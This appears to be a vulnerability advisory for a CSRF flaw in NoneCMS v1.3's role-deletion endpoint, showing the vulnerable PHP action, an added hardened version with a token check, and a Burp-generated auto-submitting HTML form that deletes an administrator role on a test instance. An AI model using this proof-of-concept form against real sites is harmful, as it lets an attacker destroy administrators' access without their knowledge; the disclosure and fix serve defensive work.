noneCms
NoneCMS v1.3 has a CSRF vulnerability in public/index.php/admin/role/dele.html
NoneCMS v1.3 has a CSRF vulnerability in public/index.php/admin/role/dele.html, as demonstrated by deleting the admin role.
The vulnerable code is the dele() action in application\admin\controller\Role.php:
    /**
     * Delete role information
     */
    public function dele()
    {
        // 'param.id/d': read id from GET or POST, cast to int, default 0
        $id = input('param.id/d', 0);
        $role = AdminRole::get($id);
        if ($role && $role->delete()) {
            return ['status' => 1, 'msg' => '删除成功'];   // "delete succeeded"
        } else {
            return ['status' => 0, 'msg' => '删除失败'];   // "delete failed"
        }
    }
There is no CSRF token check here, and the HTTP method is not restricted either: the ThinkPHP input('param.id/d') helper accepts id from the query string as well as the POST body, so any page that makes a logged-in administrator's browser send a GET request to this URL with an id parameter deletes that role. The browser attaches the administrator's session cookie automatically, which is all the authentication the action relies on.
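A hardened version of the same action, added here as an example and not NoneCMS's own fix, restricts the action to POST and requires a per-session synchronizer token submitted in the request body. The helper functions, the field name __token__, and the assumption that the controller extends think\Controller (so $this->request and the input() helper are available) are mine; the namespace and use lines of the real file are omitted. Plain PHP session functions are used for the token so the check does not depend on which token helper the installed ThinkPHP version ships.

```php
<?php
// Added example: hardened Role::dele() with a CSRF token check.
// Not NoneCMS code; helper names and the __token__ field are assumptions.

/**
 * Return the session's CSRF token, creating it on first use.
 * Call from the template that renders the role-management form.
 */
function csrf_token(): string
{
    if (session_status() !== PHP_SESSION_ACTIVE) {
        session_start();
    }
    if (empty($_SESSION['csrf_token'])) {
        // 32 random bytes -> 64 hex chars, unguessable by the attacker's page
        $_SESSION['csrf_token'] = bin2hex(random_bytes(32));
    }
    return $_SESSION['csrf_token'];
}

/** Hidden input to embed in the (same-origin) delete form. */
function csrf_token_field(): string
{
    return '<input type="hidden" name="__token__" value="'
        . htmlspecialchars(csrf_token(), ENT_QUOTES, 'UTF-8') . '">';
}

/**
 * Compare a submitted token with the session copy.
 * hash_equals() keeps the comparison constant-time.
 */
function csrf_token_valid(?string $submitted): bool
{
    if (session_status() !== PHP_SESSION_ACTIVE) {
        session_start();
    }
    $expected = $_SESSION['csrf_token'] ?? '';
    return $submitted !== null
        && $expected !== ''
        && hash_equals($expected, $submitted);
}

class Role extends \think\Controller   // assumption: base class of the real controller
{
    public function dele()
    {
        // 1. State-changing action: POST only. The GET form in the PoC,
        //    or an <img>/<a> pointing at this URL, is rejected outright.
        if (!$this->request->isPost()) {
            return ['status' => 0, 'msg' => 'method not allowed'];
        }

        // 2. Token must come from the POST body, never from the query string,
        //    and must match the value stored in the admin's session.
        if (!csrf_token_valid(input('post.__token__'))) {
            return ['status' => 0, 'msg' => 'invalid CSRF token'];
        }

        // 3. Same read as before, but only from the POST body.
        $id = input('post.id/d', 0);
        $role = AdminRole::get($id);
        if ($role && $role->delete()) {
            return ['status' => 1, 'msg' => '删除成功'];
        }
        return ['status' => 0, 'msg' => '删除失败'];
    }
}
```

The attacker's page can still make the victim's browser send a POST, but it cannot read the token out of the admin's session or out of a same-origin page, so the check in step 2 fails. Setting the session cookie with SameSite=Lax (or Strict) is a useful second layer, since the browser then withholds the cookie on the cross-site request in the first place, but it is not a substitute for the token check on older browsers.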
So the PoC can be written as the following csrf.html. The host and the role id (6 here) are those of the test instance; the form has no method attribute, so it is submitted as a GET:
    <html>
      <!-- CSRF PoC - generated by Burp Suite Professional -->
      <body>
        <form action="http://172.23.64.227:88/nonecms/public/index.php/admin/role/dele.html">
          <input type="hidden" name="id" value="6" />
          <input type="submit" value="Submit request" />
        </form>
        <!-- auto-submit the form with JavaScript, no click needed -->
        <script>
          var m = document.getElementsByTagName('form')[0];
          m.submit();
        </script>
      </body>
    </html>
Before the administrator visits the malicious page, the admin role exists in the role management page:
When the administrator visits the malicious page, the form is submitted automatically and the CSRF attack is triggered:
Although the response status code is 500, the admin role has already been deleted. A server error in the response does not mean the request was rejected, so the result should be verified in the role list rather than judged from the status code: